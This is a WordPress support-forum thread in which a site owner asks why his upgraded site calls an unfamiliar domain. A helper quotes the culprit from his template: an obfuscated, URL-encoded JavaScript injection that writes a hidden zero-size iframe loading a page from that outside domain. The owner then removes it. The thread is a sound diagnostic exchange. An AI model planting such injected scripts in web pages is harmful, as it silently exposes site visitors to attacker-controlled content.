WordPress.org

Ready to get started?Download WordPress

Forums

[resolved] Loading v2.1 front page calls Nownames.org - why? (5 posts)

  1. CommunityGroups
    Member
    Posted 7 years ago #

    I've just upgraded my site to version 2.1 and notice that when I bring it up in the browser (Firefox) it calls http://www.nownames.org, which I've not heard of. Is it spyware and how can I stop it?

    Thanks, Robert

  2. DianeV
    Member
    Posted 7 years ago #

    I'm not sure which site you're referring to -- is it the one in your profile?
    http://www.verulamra.org.uk/

    If so, it looks like you used the Binary Bonsai template -- however, what I notice is that there is some strange(?) code, including a JavaScript converted to non-standard language, above the doctype:

    <html>
    <script language="javascript">
    s=unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%6E%6F%77%6E%61%6D%65%73%2E%6F%72%67%2F%69%6D%61%67%65%73%2F%69%6E%2E%70%68%70%3F%61%64%76%3D%33%22%20%57%49%44%54%48%3D%22%30%25%22%20%48%45%49%47%48%54%3D%22%30%25%22%20%4D%41%52%47%49%4E%48%45%49%47%48%54%3D%22%30%22%20%4D%41%52%47%49%4E%57%49%44%54%48%3D%22%30%22%20%53%43%52%4F%4C%4C%49%4E%47%3D%22%61%75%74%6F%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%4E%4F%52%45%53%49%5A%45%3E%3C%2F%69%66%72%61%6D%65%3E%0A");
    document.writeln(s);document.close();
    </script>
    </html>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

    Did you put that there?

  3. DianeV
    Member
    Posted 7 years ago #

    Ah, I see that the actual JavaScript in your template looks different than what was printed above ... I'm guessing that the forum software translated it, but we can see that something is happening there.

    If you didn't add that to your header (including the extra <html> tag), I'd remove it and see if that doesn't fix your problem.

    And *then* I'd try to figure out why that's in your code.

  4. CommunityGroups
    Member
    Posted 7 years ago #

    Thanks for your quick and helpful reply Diane. Yes it's http://www.verulamra.org.uk. I've replaced the index.php file and it seems OK now. I'm not really concerned with persuing how it got there just getting rid of it.

    I've been recieving a lot of bounced spam which appears to have originated from this site and am wondering if it's related...

    Anyway I recall having to edit files in earlier versions of WordPress - which did not impress me at all - that could be something to do with it. I don't know. I found the upgrade instructions for version 2.1 not as clear as they could be. I was unsure which files I needed to retain. If, as I understand it, upgrades are to be available more frequently then a perhaps a more automated way of handling it could be considered.

    Thanks again, Robert

  5. DianeV
    Member
    Posted 7 years ago #

    Well, that's one of the "things" with the Web; it's technical, and if you want to do much at all with it, you have to learn some things.

    I'm glad it worked out for you. However, if you did not upload the file containing that stuff, then I would be concerned because ... well, someone did.

Topic Closed

This topic has been closed to new replies.

About this Topic